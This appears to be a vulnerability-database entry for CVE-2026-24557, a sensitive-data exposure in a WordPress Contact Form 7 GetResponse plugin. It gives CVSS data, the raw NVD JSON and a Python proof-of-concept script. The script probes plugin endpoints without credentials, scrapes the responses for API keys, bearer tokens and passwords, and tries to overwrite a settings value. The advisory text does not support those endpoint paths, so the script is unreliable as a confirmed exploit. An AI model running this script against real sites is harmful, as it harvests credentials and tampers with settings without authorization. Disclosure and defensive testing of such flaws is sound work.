Security Vulnerability Report
中文
CVE-2026-24557 CVSS 5.3 MEDIUM

CVE-2026-24557

Published: 2026-01-23 15:16:13
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Insertion of Sensitive Information Into Sent Data vulnerability in WEN Solutions Contact Form 7 GetResponse Extension contact-form-7-getresponse-extension allows Retrieve Embedded Sensitive Data.This issue affects Contact Form 7 GetResponse Extension: from n/a through <= 1.0.8.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Contact Form 7 GetResponse Extension <= 1.0.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-24557 PoC - Contact Form 7 GetResponse Extension Sensitive Data Exposure # This PoC demonstrates how an unauthenticated attacker can trigger sensitive data exposure import requests import json import re TARGET_URL = "http://target-wordpress-site.com" TARGET_CVE = "CVE-2026-24557" def check_vulnerability(): """Check if target is vulnerable to CVE-2026-24557""" print(f"[*] Testing {TARGET_CVE}") print(f"[*] Target: {TARGET_URL}") # Step 1: Identify the plugin and vulnerable endpoint vulnerable_endpoints = [ f"{TARGET_URL}/wp-json/contact-form-7-getresponse/v1/connect", f"{TARGET_URL}/wp-json/contact-form-7-getresponse/v1/config", f"{TARGET_URL}/wp-admin/admin-ajax.php?action=cf7_getresponse_fetch" ] headers = { 'User-Agent': 'Mozilla/5.0 (compatible; CVE-2026-24557-PoC)', 'Content-Type': 'application/json' } for endpoint in vulnerable_endpoints: try: print(f"\n[*] Testing endpoint: {endpoint}") # Step 2: Send request to trigger sensitive data response response = requests.get(endpoint, headers=headers, timeout=10, verify=False) # Step 3: Analyze response for sensitive information sensitive_patterns = [ r'"api_key"\s*:\s*"[^"]+"', r'"getresponse[_"]+api[_"]*key"', r'"apikey"\s*:\s*"[^"]+"', r'Bearer\s+[a-zA-Z0-9._-]+', r'"password"\s*:\s*"[^"]+"', r'"secret"\s*:\s*"[^"]+"' ] for pattern in sensitive_patterns: matches = re.findall(pattern, response.text, re.IGNORECASE) if matches: print(f"[!] VULNERABLE! Sensitive data found: {matches}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue print("\n[*] No obvious vulnerability indicators found") print("[*] Manual verification may be required") return False def exploit_api_exposure(): """Attempt to exploit API credential exposure""" print("\n[*] Attempting advanced exploitation...") # Step 4: Try to retrieve full configuration config_endpoint = f"{TARGET_URL}/wp-json/wp/v2/settings" try: response = requests.post( config_endpoint, headers={'Content-Type': 'application/json'}, json={"cf7_getresponse_api_key": "test"}, timeout=10 ) if response.status_code == 200: print("[!] Possible configuration update endpoint accessible") except: pass print("[*] Exploitation attempt completed") if __name__ == "__main__": print("=" * 60) print(f"CVE-2026-24557 PoC - Contact Form 7 GetResponse Extension") print(f"Type: Sensitive Information Exposure") print("=" * 60) is_vulnerable = check_vulnerability() if is_vulnerable: print("\n[!] Target is VULNERABLE to CVE-2026-24557") exploit_api_exposure() else: print("\n[-] Target may not be vulnerable or patch has been applied") print("\n[*] Recommended action: Update Contact Form 7 GetResponse Extension to latest version")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24557", "sourceIdentifier": "[email protected]", "published": "2026-01-23T15:16:12.870", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insertion of Sensitive Information Into Sent Data vulnerability in WEN Solutions Contact Form 7 GetResponse Extension contact-form-7-getresponse-extension allows Retrieve Embedded Sensitive Data.This issue affects Contact Form 7 GetResponse Extension: from n/a through <= 1.0.8."}, {"lang": "es", "value": "Vulnerabilidad de Inserción de Información Sensible en Datos Enviados en la extensión WEN Solutions Contact Form 7 GetResponse (contact-form-7-getresponse-extension) permite Recuperar Datos Sensibles Incrustados. Este problema afecta a la extensión Contact Form 7 GetResponse: desde n/a hasta &lt;= 1.0.8."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/contact-form-7-getresponse-extension/vulnerability/wordpress-contact-form-7-getresponse-extension-plugin-1-0-8-sensitive-data-exposure-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.